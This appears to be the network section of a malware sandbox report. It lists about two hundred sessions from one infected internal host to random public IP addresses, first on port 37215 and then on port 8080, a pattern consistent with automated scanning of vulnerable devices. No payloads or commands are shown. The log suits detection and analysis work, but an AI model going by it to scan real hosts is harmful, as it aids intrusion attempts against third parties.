                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21190192.168.2.233669041.17.206.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21191192.168.2.2335734201.7.243.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192192.168.2.2335350120.246.229.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21193192.168.2.2344498157.54.62.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21194192.168.2.2344194197.251.241.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21195192.168.2.2349596197.73.233.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21196192.168.2.233390641.151.150.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21197192.168.2.2347078197.58.154.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21198192.168.2.234015841.182.100.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21199192.168.2.2359182197.95.42.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21200192.168.2.2337604197.139.191.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21201192.168.2.2357692112.8.132.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21202192.168.2.2334086197.215.88.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21203192.168.2.235979841.216.253.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21204192.168.2.2345412165.6.106.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21205192.168.2.2348004157.129.33.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21206192.168.2.2339530197.176.213.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21207192.168.2.2353332197.102.186.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21208192.168.2.2352206157.167.71.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21209192.168.2.2350654145.13.101.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21210192.168.2.235722241.236.114.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21211192.168.2.2360752200.155.107.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21212192.168.2.235837641.50.130.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21213192.168.2.2359678197.171.159.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21214192.168.2.2337114157.56.142.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21215192.168.2.2350778157.76.86.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21216192.168.2.2354804157.161.73.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21217192.168.2.233851641.252.15.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21218192.168.2.2360354157.141.67.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21219192.168.2.234575253.215.152.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21220192.168.2.233400441.99.22.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21221192.168.2.2347656157.2.157.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21222192.168.2.233656273.184.185.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21223192.168.2.2342120173.193.91.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21224192.168.2.2342900113.207.129.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21225192.168.2.2358072157.121.158.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21226192.168.2.233857018.67.224.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21227192.168.2.234471841.209.135.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21228192.168.2.2340908197.159.242.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21229192.168.2.2356618181.151.242.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21230192.168.2.2336038197.68.157.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21231192.168.2.2333016111.203.92.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21232192.168.2.2354370157.54.141.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21233192.168.2.235768241.221.179.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21234192.168.2.234290841.222.154.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21235192.168.2.23557785.181.21.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21236192.168.2.2357894197.176.171.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21237192.168.2.2356168157.50.181.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21238192.168.2.2344150197.49.251.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21239192.168.2.2349948197.53.236.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21240192.168.2.2352340206.34.54.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21241192.168.2.2344208197.239.63.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21242192.168.2.2345336197.10.63.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21243192.168.2.233322441.75.19.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21244192.168.2.2338522157.223.42.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21245192.168.2.2354064197.47.107.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21246192.168.2.2346230157.14.217.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21247192.168.2.233509841.51.115.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21248192.168.2.2357690157.216.36.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21249192.168.2.2360578131.30.133.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21250192.168.2.233685041.163.193.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21251192.168.2.2359814157.45.148.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21252192.168.2.2350718197.195.185.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21253192.168.2.2345486157.197.157.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21254192.168.2.2336930157.47.99.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21255192.168.2.2359176197.112.142.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21256192.168.2.233855641.4.59.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21257192.168.2.235455041.247.64.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21258192.168.2.2352248126.85.233.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21259192.168.2.2360978157.247.68.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21260192.168.2.2358096157.216.218.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21261192.168.2.235112431.40.163.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21262192.168.2.2351002144.162.97.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21263192.168.2.2349386157.182.181.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21264192.168.2.2335500163.87.16.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21265192.168.2.2334504157.194.60.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21266192.168.2.2354264157.132.179.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21267192.168.2.2343578157.20.232.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21268192.168.2.235806641.66.156.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21269192.168.2.2338122197.23.244.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21270192.168.2.2333670163.16.63.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21271192.168.2.2342338197.172.164.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21272192.168.2.2347586197.245.60.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21273192.168.2.233540241.161.23.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21274192.168.2.2338032197.226.149.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21275192.168.2.2359604201.27.192.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21276192.168.2.2350304219.209.238.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21277192.168.2.234635841.6.53.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21278192.168.2.2340822157.105.122.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21279192.168.2.2337550157.34.176.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21280192.168.2.2352900157.76.38.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21281192.168.2.2353756157.166.218.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21282192.168.2.2341228197.189.98.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21283192.168.2.235494441.130.217.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21284192.168.2.2351742197.166.108.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21285192.168.2.2350752157.171.242.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21286192.168.2.2348298114.224.129.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21287192.168.2.234690273.171.166.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21288192.168.2.2350190197.203.127.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21289192.168.2.2340396197.244.227.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21290192.168.2.2358468186.27.90.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21291192.168.2.2352704157.250.175.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21292192.168.2.235701265.39.214.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21293192.168.2.2345780157.248.177.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21294192.168.2.2337788157.49.58.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21295192.168.2.2350112197.109.185.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21296192.168.2.2358434197.127.163.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21297192.168.2.2337884157.78.192.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21298192.168.2.234915641.144.73.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21299192.168.2.235631041.55.149.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21300192.168.2.2351288197.193.206.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21301192.168.2.233529873.150.5.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21302192.168.2.2348870197.204.185.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21303192.168.2.235308876.34.233.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21304192.168.2.2346022197.87.96.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21305192.168.2.2355780107.19.197.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21306192.168.2.235650441.251.5.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21307192.168.2.2338070197.165.234.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21308192.168.2.233508214.97.50.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21309192.168.2.233318272.112.100.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21310192.168.2.2354922157.29.196.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21311192.168.2.2336210197.114.188.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21312192.168.2.2340950157.142.30.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21313192.168.2.2338372157.16.219.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21314192.168.2.2348196197.232.204.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21315192.168.2.235766846.17.1.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21316192.168.2.235282841.36.237.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21317192.168.2.2344592174.104.81.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21318192.168.2.235388239.151.208.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21319192.168.2.2349748157.170.109.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21320192.168.2.2335898213.247.151.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21321192.168.2.2338656197.179.167.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21322192.168.2.2346286157.40.73.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21323192.168.2.2354418197.48.109.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21324192.168.2.2356624197.71.76.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21325192.168.2.2352850205.66.204.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21326192.168.2.233505649.212.8.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21327192.168.2.234066883.140.204.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21328192.168.2.2360046157.182.3.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21329192.168.2.2343718197.15.167.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21330192.168.2.235491841.183.20.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21331192.168.2.234767684.124.206.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21332192.168.2.2336250197.65.186.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21333192.168.2.2342558206.68.173.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21334192.168.2.2338276117.167.254.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21335192.168.2.2347222103.82.199.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21336192.168.2.235159687.234.39.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21337192.168.2.2339092212.79.16.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21338192.168.2.235919060.119.148.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21339192.168.2.2355888216.6.203.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21340192.168.2.2342228219.87.195.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21341192.168.2.2338860165.48.250.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21342192.168.2.2340374140.192.156.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21343192.168.2.2336840171.216.3.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21344192.168.2.235413063.178.148.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21345192.168.2.236095671.116.30.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21346192.168.2.234087072.56.249.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21347192.168.2.2350656185.83.45.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21348192.168.2.233388427.121.177.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21349192.168.2.233633894.169.159.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21350192.168.2.2353858207.100.64.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21351192.168.2.2349112176.213.194.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21352192.168.2.234319479.54.23.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21353192.168.2.235978294.204.4.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21354192.168.2.2335448181.28.184.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21355192.168.2.233977824.169.28.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21356192.168.2.233380053.213.54.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21357192.168.2.234655250.24.170.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21358192.168.2.235300832.97.117.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21359192.168.2.2334308146.215.64.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21360192.168.2.23557622.238.248.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21361192.168.2.2350558112.22.178.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21362192.168.2.2337834133.44.252.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21363192.168.2.235737677.55.144.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21364192.168.2.233822475.81.183.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21365192.168.2.2333828200.25.54.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21366192.168.2.2337284196.246.126.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21367192.168.2.2348054166.209.236.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21368192.168.2.2342248145.44.141.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21369192.168.2.2342078165.172.24.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21370192.168.2.2338298198.74.43.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21371192.168.2.23525169.49.99.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21372192.168.2.2359592206.231.102.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21373192.168.2.2334220152.240.11.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21374192.168.2.2337100136.76.61.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21375192.168.2.2344422137.9.159.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21376192.168.2.233707675.222.51.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21377192.168.2.2336710143.150.33.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21378192.168.2.234110067.106.250.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21379192.168.2.2348434130.23.128.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21380192.168.2.2350142145.184.145.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21381192.168.2.2337304180.174.118.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21382192.168.2.235567462.233.170.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21383192.168.2.2355750159.128.225.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21384192.168.2.2345156191.83.87.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21385192.168.2.2350526141.72.98.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21386192.168.2.234060259.223.116.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21387192.168.2.2351150170.187.159.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21388192.168.2.2351408197.56.25.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21389192.168.2.23370288.28.213.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21390192.168.2.234121264.134.243.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21391192.168.2.236062442.223.0.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21392192.168.2.233584689.101.181.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21393192.168.2.2357172112.210.51.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21394192.168.2.2345908159.200.156.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21395192.168.2.2341872137.101.209.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21396192.168.2.2333368134.180.139.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21397192.168.2.235591217.235.143.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21398192.168.2.233800486.166.208.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
